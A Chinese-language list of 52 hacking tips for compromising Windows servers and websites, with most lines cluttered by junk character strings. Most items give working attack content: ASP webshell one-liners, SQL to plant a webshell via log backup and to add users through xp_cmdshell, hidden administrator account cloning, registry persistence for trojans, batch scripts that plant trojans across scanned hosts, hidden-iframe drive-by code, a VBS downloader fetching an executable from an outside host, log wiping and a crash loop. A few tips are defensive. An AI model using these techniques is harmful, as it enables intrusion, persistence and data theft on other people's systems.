Xp系统修改权限防止病毒或木马等破坏系统,cmd下,: ^ ~; ?" [# p" `1 q- W3 r, U
cacls C:\windows\system32 /G hqw20:R/ A. y5 ^& _. R
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入( f5 @! W3 {" F6 c+ `" L
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F2 Y' p0 I# l0 n
+ m0 P7 _9 ], j- b. c
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。6 K/ _4 m* C4 t% h5 K0 J* x) Y: F
- f. S6 V+ W* R/ D
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
! C/ q5 g6 \5 A* ?' P+ k- t5 V( W/ d9 j5 f8 Y0 F5 T
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
$ M, b% O1 a0 O' ?# |) T" C0 Y- W# K2 C, C |: N# m# _
5、利用INF文件来修改注册表
1 s" a. E2 ~$ M3 Q) \[Version]
u4 M# X0 E- N5 [! BSignature="$CHICAGO$"
' A9 m* x7 e! t3 `8 |6 q$ [[Defaultinstall]. l9 j1 C. p X4 h3 o' W* L
addREG=Ating O9 b+ Q/ \% N" ^: w
[Ating]' j1 ?1 C4 B- T" o# V& B
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
& {' M7 G. j% [0 p+ g以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
; a5 t" m; r+ f+ L* b3 rrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
[' k: z+ v/ w其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU* i% f" f1 k4 N, r
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU3 @+ Y" [' d! `, C* g
HKEY_CURRENT_CONFIG 简写为 HKCC" q# H. r6 P) p& E/ o
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值6 N+ y5 z3 J& e7 Z! X" L
"1"这里代表是写入或删除注册表键值中的具体数据# y J1 Z5 x! c+ g: `
: ]+ y f |( R9 {6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,# s1 b/ x/ l, c1 R! H
多了一步就是在防火墙里添加个端口,然后导出其键值
" f3 ~3 z/ Y1 d+ f) F- u[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
g9 Q* o# \" r% |$ D3 n5 o8 @ l4 w5 `1 a
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽4 a3 Q, U; s$ s! A% M
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。4 A7 `. Q! P9 i$ X2 c5 A" Z
$ X0 e: B1 _* c7 z( m9 Y
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
. k2 U) ]' {7 H2 S% h0 m& u6 b# y8 b. D
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
# W+ C# ~7 Q( x& b9 ?可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。. x- `2 v6 p* u( Y* N) J& c+ w0 J! v
1 M4 s2 g; }3 ]& [
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”, U& C" [* `! ^1 `+ x; }5 E' A
: X+ o! C! d5 ]# Z: I) x/ r1 y
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,% F( `! c8 c! s O6 ~- N1 k
用法:xsniff –pass –hide –log pass.txt
1 J. @ N; ?# l1 g
- _7 J* w% {/ W5 }( \7 n12、google搜索的艺术
5 y2 O. U$ h! \1 C4 W, u搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”6 O8 D+ W2 K# Q- K& Y
或“字符串的语法错误”可以找到很多sql注入漏洞。1 F, Z" L1 q( ^1 w! I, V
9 Z2 N+ B: I! j# Q, S13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。& f3 F" N- {) t- C3 ?8 Z% r9 h
4 \# a3 z. A+ w* ]7 ~) X4 R" s! e
14、cmd中输入 nc –vv –l –p 1987& T; I* n% n, F( Y, g+ l4 j1 l8 p) O
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃1 m, D, M1 ^; t2 ^, g1 ^
& p( a' C: s* f+ Z/ Z6 f
15、制作T++木马,先写个ating.hta文件,内容为$ ] Q6 e0 F2 p3 r
<script language="VBScript">
' d- U+ ]. B7 b- c# qset wshshell=createobject ("wscript.shell" )
8 I, K* \ A& X) F4 q% K, `a=wshshell.run("你马的名称",1)
( E% J( A& K( v$ fwindow.close
! L" a) S; T7 e# F/ a" I</script>" _$ c: [$ V, ?4 O7 y
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
7 C: d$ `* j, G- j9 e/ e6 K0 s! o; \3 {2 g; u7 q# I/ i
16、搜索栏里输入7 a& A( s. B5 j# W0 M8 x
关键字%'and 1=1 and '%'='& K5 O: }; [5 [5 w' F6 h3 q7 D; h8 y3 ?' t
关键字%'and 1=2 and '%'='
( K9 i0 ~' m- Q5 X; }$ N比较不同处 可以作为注入的特征字符
" n; V$ R" x+ q q% ]+ O$ T1 r8 D1 i: ~ k
17、挂马代码<html>8 l% }; k1 q7 S! P
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
0 v! m( F7 @" P+ r8 A. W4 ?* S. [</html>0 L# N5 s5 K1 U' X2 P$ m- P3 X
) {) z1 |& ]8 _4 b18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
1 n6 @: |) C9 g2 Nnet localgroup administrators还是可以看出Guest是管理员来。
6 B$ a' i P; G: T0 F/ \# J3 p3 P' L3 [$ t. j. N. h
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
" M) |/ O4 X L7 h9 ~, X用法: 安装: instsrv.exe 服务名称 路径
. c! ~9 R; z2 l+ b }卸载: instsrv.exe 服务名称 REMOVE7 o0 ~% i* }% Z8 F( j: H
, u2 Y4 J7 a! u
: Y- e8 `" W; `% W( O4 @
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉 } c, I9 o5 w* K9 v1 g, h0 P( q
不能注入时要第一时间想到%5c暴库。
4 {* h; f2 _1 H5 N: v, F6 G% o4 o
$ w8 m$ E/ x1 F! M22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
- d* m; f" c& s* `1 b+ k* H2 u$ P! Q% a* o; g. k
23、缺少xp_cmdshell时& U* f5 k2 G9 U' R) c; q6 Z# v
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'9 {9 G/ {8 c. H0 @' q6 T% a
假如恢复不成功,可以尝试直接加用户(针对开3389的)
% l# g& \1 d( |7 B9 a% Kdeclare @o int
! F4 ?3 S0 r* v6 bexec sp_oacreate 'wscript.shell',@o out
- u: W$ |+ P+ Z texec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
1 @9 ?0 b6 r0 m4 _% Z
( w1 D, ~* {- w24.批量种植木马.bat
/ o. b; e. H% x' e! I: ifor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
. n& p& Y' w% _7 N2 X% N, n3 Bfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
& C- k2 W( `! I+ T5 W/ O% |扫描地址.txt里每个主机名一行 用\\开头
' b9 O. [% j4 }- d0 |: k7 U* ~5 s* N u$ O
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。% ]8 \1 |9 P$ L2 C: Z) s
( s& x( ~" ?" ^, l8 D
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
3 B) Q% l+ t+ K' p* R/ Y将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
- ^! u" V' C8 }.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
1 v) A$ z) I9 b, t0 N% t5 B5 S6 H( P9 C+ `" ^% h1 p8 Q
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP2 a: Q) L. B$ `) t3 b \
然后用#clear logg和#clear line vty *删除日志
, ^6 Y+ M/ n* r1 y" v. `7 N+ r' b' d3 C9 ^' v
28、电脑坏了省去重新安装系统的方法* [8 h8 l8 D7 R5 J; q! O
纯dos下执行,* k+ w0 Y$ T+ M% N; `+ G0 P# @4 k
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
/ @* C2 @( }3 X1 _( n2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config/ t4 e$ P* m, Z: H
]% ^! N# u3 E1 x29、解决TCP/IP筛选 在注册表里有三处,分别是:
. \# Z m0 Z5 ]: U0 YHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
5 R/ b! o8 |2 y* u; {HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
- F6 g7 G! M5 ^4 m* ]% M" g; C# D$ ?HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
; n& H0 {5 h( P# g$ ^/ c) ~分别用
" S* d% v0 q& k+ fregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
8 n5 t3 V6 j$ K0 ?6 ~regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
+ o1 A" V$ N6 ^$ pregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip8 F2 q. X% ~4 V7 J; h" M
命令来导出注册表项
" [$ T ?; E) ~然后把三个文件里的EnableSecurityFilters"=dword:00000001,
# t! j1 I' {6 L; W* U改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用2 z7 ]5 h5 H- X' L1 v+ k! b! X
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。. C6 T: t" U; N% f! m+ U
$ A( l" [; z0 N# b& X: W5 J30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
% Q( I" D% z; l" M, Y" uSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
1 w- K/ A) f2 ~! [
, d5 v P5 O; ^$ G31、全手工打造开3389工具/ d* ]5 w: _, Z4 K8 H
打开记事本,编辑内容如下:
) i1 L. G5 O, X2 d2 M# b7 J7 lecho [Components] > c:\sql6 Y S: ~$ o0 c; f$ |( U
echo TSEnable = on >> c:\sql/ [& s! O9 c' M
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
; X, w+ I6 o, ]2 p \; b( i, O, ~" X编辑好后存为BAT文件,上传至肉鸡,执行9 n7 k4 r6 u9 C
0 q5 I) g( `# W7 o# @5 P9 ~& Q
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
5 \1 W$ c. n! q) }+ @9 k x3 S+ o! a; ~+ d2 Y3 M$ p
33、让服务器重启
, a3 z( b5 [, ?) W1 T/ L写个bat死循环:
( G- P$ k. l- t( d" X@echo off9 s7 ^* L$ Q. M* |7 s* Z3 J, B; x
:loop1
. I; E3 Q! v% T9 O8 ecls; e7 x2 V. C+ y0 I: A( J( \0 i
start cmd.exe
; N, s+ r3 v$ Q# R6 o: o' ^8 Fgoto loop1
7 c! w& y7 I# r7 k保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启* R1 B0 d; \5 k, v0 ~. {
: D x% q; g) G* b4 N
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
6 Q9 ^7 @6 K3 `; f4 p@echo off8 f' M/ X9 F" D; w
date /t >c:/3389.txt
$ Q! |3 C& ~# x# D, n" O4 ztime /t >>c:/3389.txt
}. [2 }; r5 ~attrib +s +h c:/3389.bat5 l& D: b F/ `
attrib +s +h c:/3389.txt
6 x5 p8 Z& d# l' |& g+ qnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
( }% Z# Q5 ~$ I6 q0 S' r$ {/ p& ?并保存为3389.bat# H; r7 h. z1 S* Z! j
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号" `& H! @) X6 J q
! g/ B* a: m) [8 y2 i. U: v1 g
35、有时候提不了权限的话,试试这个命令,在命令行里输入:/ j1 l# @% [& P3 J7 ~1 k
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)5 P# W) r0 v- W4 Y
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。3 F1 R! H6 k" h; }, K& ]
, V- U4 P, Q+ X0 U" R6 H4 m6 R36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件/ g. i% p) \0 \/ k5 f
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址# A! W. k1 q' X6 f
echo 你的FTP账号 >>c:\1.bat //输入账号5 D( C6 b) }% ]+ F
echo 你的FTP密码 >>c:\1.bat //输入密码
# [# r+ a" F, Z0 secho bin >>c:\1.bat //登入
5 N; x. T k3 d! B4 aecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
! s# b3 Y* T9 Q9 `& ]echo bye >>c:\1.bat //退出1 W0 G3 A: s2 T, Z2 ]( @
然后执行ftp -s:c:\1.bat即可
* f4 ]7 ?6 E, X, j- S/ w9 n+ d, w4 d, z, L' d; ]: u( q4 z2 a
37、修改注册表开3389两法8 R3 h! T2 D! u8 z$ }
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
& W8 s$ g) `# xecho Windows Registry Editor Version 5.00 >>3389.reg' S( N: ] ~& O9 U
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg3 m/ g: i2 T& B, Q& ~
echo "Enabled"="0" >>3389.reg
* ]/ Z2 O/ s: e g; wecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows( }3 v' H. p. D4 R' H# ?/ i% Y
NT\CurrentVersion\Winlogon] >>3389.reg
' }4 U/ [6 A* wecho "ShutdownWithoutLogon"="0" >>3389.reg# O3 V5 t) y# Q1 }% W
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] S# G: C9 v( b
>>3389.reg
/ f, h5 a/ Z0 m4 T# {: }echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
. s9 i% \, b I- F. O9 a. X" \: k7 ^9 ?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
' Y" O# R& l. P8 c>>3389.reg
/ x7 T4 ^6 }" t6 h; ?3 n' Qecho "TSEnabled"=dword:00000001 >>3389.reg
" {7 j' `7 x l* aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg% S: a/ S9 u, e. \- Z R# n; N, Q
echo "Start"=dword:00000002 >>3389.reg& f) q4 ]4 E$ I' Z# g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
( a$ p8 }8 N) W5 y. ?: S8 P>>3389.reg
J' p. F* A# kecho "Start"=dword:00000002 >>3389.reg
9 k* V' f I* A% u8 a1 Vecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg- V7 S! [) G" N' ]0 w1 U8 f8 E
echo "Hotkey"="1" >>3389.reg
/ u# ^0 z, j5 y% F7 ~echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% E3 V7 I& p" Q' L% u( e qServer\Wds\rdpwd\Tds\tcp] >>3389.reg
% ~) H1 W, b/ @2 Q. L- becho "PortNumber"=dword:00000D3D >>3389.reg
/ t$ Y& m1 g6 O3 Q3 Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- n$ v- `2 Q( Y; H; s" NServer\WinStations\RDP-Tcp] >>3389.reg
3 v$ {& l, g3 c v' `3 jecho "PortNumber"=dword:00000D3D >>3389.reg5 ?& X" V9 S/ ]3 N
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。& G' @- `6 k! L& g
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
`; B; ~6 A7 U: L* Q因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
1 S" a+ _; c- U9 w" P(2)winxp和win2003终端开启% R( s/ d: j# H( x
用以下ECHO代码写一个REG文件:
" `5 i3 F$ j4 Z3 C8 D# Techo Windows Registry Editor Version 5.00>>3389.reg
+ F: P3 P" O8 K/ s( G) Q! k* ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal ?, j' G4 K1 W, h
Server]>>3389.reg7 z( a9 [* B! V- y9 K$ F
echo "fDenyTSConnections"=dword:00000000>>3389.reg, p y: j8 H9 W* i/ @) L, V
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" X/ @% v Y! S, i/ q
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
/ ^; T' V6 h% L7 {8 E Yecho "PortNumber"=dword:00000d3d>>3389.reg
, ], l; P3 K# I) C( |" Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 ?! `' z; ?% w B* NServer\WinStations\RDP-Tcp]>>3389.reg' `/ A4 l( t" C5 f' j( n, A
echo "PortNumber"=dword:00000d3d>>3389.reg2 e- }* u& B) p) p/ K
然后regedit /s 3389.reg del 3389.reg3 J y9 E6 ?& q
XP下不论开终端还是改终端端口都不需重启
% l. d) i! R5 D1 F3 v; n1 q" e4 n! \+ g2 z! u. t- R9 v
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
" p; K; W0 }3 n! o用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'# d" a; ` Q) N6 u2 S7 F7 m
, Q1 [6 N5 w4 R
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
, n# ?, f. T) h$ x8 }$ x9 ]8 ?(1)数据库文件名应复杂并要有特殊字符
4 a4 q8 _5 D9 m4 K3 ?(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
Q& `: Z( S# Y0 v0 y将conn.asp文档中的
+ I; E; r8 x# m9 X* y% LDBPath = Server.MapPath("数据库.mdb")
% n1 M; G) c, G6 J _* e: w. Mconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath$ R I, R4 b' g9 Z5 D
. \& J* P3 T$ l C4 y* J: X修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
7 G- y! Q" B- f, K( o/ y2 e: b. C(3)不放在WEB目录里& W# J: T# M$ T$ X
3 `( [6 X9 p) f8 z' w( b+ U4 ~
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
+ U# U4 F# w& A" }: c可以写两个bat文件
0 F; p9 }1 c$ H2 D@echo off
: M9 j( d9 o/ w* O" g@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe4 K3 y1 a" z0 @3 W W2 `& t3 x
@del c:\winnt\system32\query.exe% y4 l* o1 {' E( d/ g
@del %SYSTEMROOT%\system32\dllcache\query.exe
" @1 s& }# t' \$ l3 N@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的$ e1 j1 F3 f2 I& |5 u
* U/ u' c w7 y+ r9 q4 K3 d@echo off
/ ?' p4 m" O7 l@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe" E1 ~! S4 j1 }" R5 v7 k
@del c:\winnt\system32\tsadmin.exe
7 q- f4 \0 ?" ^@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex# }+ |2 G2 h# Y+ N* l5 i
( I. |8 u# Y: c7 z$ Q1 ?41、映射对方盘符
5 P$ z. ?4 j# W8 o v: Btelnet到他的机器上,
8 `8 a0 ]% p4 f1 a1 U7 unet share 查看有没有默认共享 如果没有,那么就接着运行5 g4 g6 Z) }3 C: ^8 o$ ~
net share c$=c:
3 D+ X. w/ ~/ [) j$ Gnet share现在有c$
; ~6 _/ w* T9 X7 \. S在自己的机器上运行
" M: u) s H" V2 R' onet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
7 _- j3 g' F1 N0 f2 k; A
; @% Z' ?3 X4 c42、一些很有用的老知识
7 N# v8 m2 ?9 G, p( ~; btype c:\boot.ini ( 查看系统版本 )% n9 F% z. W# y% O2 D- [
net start (查看已经启动的服务)
$ a8 j6 o8 t! ?% |9 y, Squery user ( 查看当前终端连接 )7 ~# l8 b& a" e, f. D
net user ( 查看当前用户 )
8 c2 ]- V; L0 A% Y0 \net user 用户 密码/add ( 建立账号 )* _- Q/ {0 C+ I1 Z8 h
net localgroup administrators 用户 /add (提升某用户为管理员)
+ o( `" j9 B K: s5 y( e3 t. xipconfig -all ( 查看IP什么的 )
8 ?/ s3 x: @% Fnetstat -an ( 查看当前网络状态 )
1 w+ p$ S: e' q: gfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
{& I8 h/ e/ ^$ f+ B- ?1 p( _6 r克隆时Administrator对应1F47 m6 ~' y1 |2 y* [& ]
guest对应1F5
* _% Q. S( j% {6 G Ptsinternetuser对应3E8 Z1 E6 a# l' z! {# ^% M6 g
. `- u* q: L% \; u! `2 V7 ]43、如果对方没开3389,但是装了Remote Administrator Service
9 c4 ~6 s* U. z用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接 R7 T" I- \3 t. w: q6 R
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息0 u+ ^* H, u: ^( d3 W. k, n; r4 D
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"3 _/ s; W& b% A0 A; p3 p2 i
, r5 s2 c9 Q' g6 K6 Z44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
: X' ?; J- Z% ~本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)# [7 ~8 b# H X! I5 [$ y1 |* I
( F$ h. o! @1 b! X( {: t1 A45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
9 Z! i5 N4 S* s# iecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
+ U0 Z( N1 E, R; j; E4 {/ L, O( r' \^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =5 P: O! c1 x+ V" T
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
: n: j4 s" H$ M$ h1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs# [4 J; ~9 R1 Q% e
(这是完整的一句话,其中没有换行符)
7 P7 _# O$ A' x1 I% G, O然后下载:6 H! }, R: u9 G" q7 z+ P( z
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
% S: T ^% m5 z5 C# U9 g8 J! F. L3 M7 |0 |- m
46、一句话木马成功依赖于两个条件:+ l% x9 T9 ]8 F0 x: F% \
1、服务端没有禁止adodb.Stream或FSO组件
8 i8 F! j, R! N2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。 c6 X7 s; H+ L& i* p/ a' x$ f2 G7 Q
/ C; G7 w$ D2 o6 s
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
% K$ o. `) x1 Y# _) b;alter database utsz set RECOVERY FULL--) A# W0 b( [% `8 p
;create table cmd (a image)--' s5 ^) F& B& L* O+ |* V3 G
;backup log utsz to disk = 'D:\cmd' with init--# N/ j( D, \, ~5 Q L
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--* G0 Z+ ~ |4 |' c1 j% _2 B
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--2 I; X" T3 J( l5 M' y. L
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。* S9 L9 m' C+ T* s" Y. Z9 _
5 M: i8 Z1 k" Z/ Y48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
; |) h$ X, m/ J9 Q k* F# q- x0 r# m$ k0 P% t
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
( A; ?5 _5 W7 Z' ` \# O/ e所有会话用 'all'。; ~% j+ w; U. Q. x! r
-s sessionid 列出会话的信息。3 L4 i; w5 ^, C* b! a. `% U2 E
-k sessionid 终止会话。
# d; l' z6 W5 Q-m sessionid 发送消息到会话。
! j0 ~' P" {$ D3 O" X
. r- ]0 }% v7 d/ @3 Kconfig 配置 telnet 服务器参数。
8 W( {& H- H9 w& a4 Q, V+ k
( V* _9 n8 t+ }" g/ Q/ @7 |common_options 为:
: m: z* s; q+ ~. Z-u user 指定要使用其凭据的用户) _/ b0 P9 K/ o
-p password 用户密码
8 l" S% t* ^' ^1 \1 ]5 V% x. R) r' f( Q' m( J
config_options 为:( L, W: A7 K% k1 {7 Q
dom = domain 设定用户的默认域2 c0 J. K2 }, P
ctrlakeymap = yes|no 设定 ALT 键的映射
) y) F1 M" P! I. Ztimeout = hh:mm:ss 设定空闲会话超时值
+ G$ Q8 O, f7 \& F3 e3 ^+ ~timeoutactive = yes|no 启用空闲会话。- S: G- F' ~3 W! D9 i0 V! u
maxfail = attempts 设定断开前失败的登录企图数。% g, u) g4 Z/ u% U5 a3 Z3 Y
maxconn = connections 设定最大连接数。" E2 s, p7 R7 l( w0 J
port = number 设定 telnet 端口。
& V/ I' D, A, X* \sec = [+/-]NTLM [+/-]passwd
& D; Z$ ^0 V/ m: }) m设定身份验证机构
5 |/ E7 |$ a4 tfname = file 指定审计文件名。
: g) k' s2 Q! W8 A8 y% h/ |fsize = size 指定审计文件的最大尺寸(MB)。. Q! g; u* c5 }7 P/ d
mode = console|stream 指定操作模式。
1 t$ B$ ~. {4 ^1 f$ u& Y. {$ E- ]auditlocation = eventlog|file|both# L6 {( l& Q$ u3 e* s+ K
指定记录地点
0 n D0 Y" A c+ k6 y0 G) Xaudit = [+/-]user [+/-]fail [+/-]admin
: G5 b9 ]7 ^4 d {/ g# [ z- Y# c' d7 @6 {7 s; U1 r
49、例如:在IE上访问:
9 T5 U+ Y8 ?- K- xwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/ G. D, B0 B& b# {7 ?: ]9 u, _
hack.txt里面的代码是:
8 [9 b: Q3 C8 n<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">9 Y3 A3 p/ K; ~0 N
把这个hack.txt发到你空间就可以了!
# k# J, H4 U1 T3 L# O这个可以利用来做网马哦!
6 @ ^) s% U/ S' S4 X0 W4 u" y" E
50、autorun的病毒可以通过手动限制!
# q; Y' z% k$ G& C1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
8 m5 V4 x* e! l* X2,打开盘符用右键打开!切忌双击盘符~8 F+ y. t3 y3 q; f
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
( v0 X- N) }3 k2 ^' {+ L4 F# @: j( C& f/ \1 Y3 l: u. T
51、log备份时的一句话木马:* ~* b6 V. U5 }3 b4 ~3 z2 y8 a
a).<%%25Execute(request("go"))%%25>) b: U1 W* L2 l+ ]- O% u0 F
b).<%Execute(request("go"))%>
W, ^7 H7 S( [, ` V* z0 Q' kc).%><%execute request("go")%><%+ X" F$ t+ Q& e
d).<script language=VBScript runat=server>execute request("sb")</Script>
( p" ^* f! \' v% `/ R7 Ne).<%25Execute(request("l"))%25>% I. e) w, t$ P. K0 S: m& f0 v3 r
f).<%if request("cmd")<>"" then execute request("pass")%>
1 b6 o* ]' o) q, @# a; e6 J' ~3 h0 r \6 s Y( z
52、at "12:17" /interactive cmd2 W$ l/ T8 J: j" f0 a7 h) j
执行后可以用AT命令查看新加的任务8 _$ ?, Y8 _( c. _3 F% v/ H* u* X
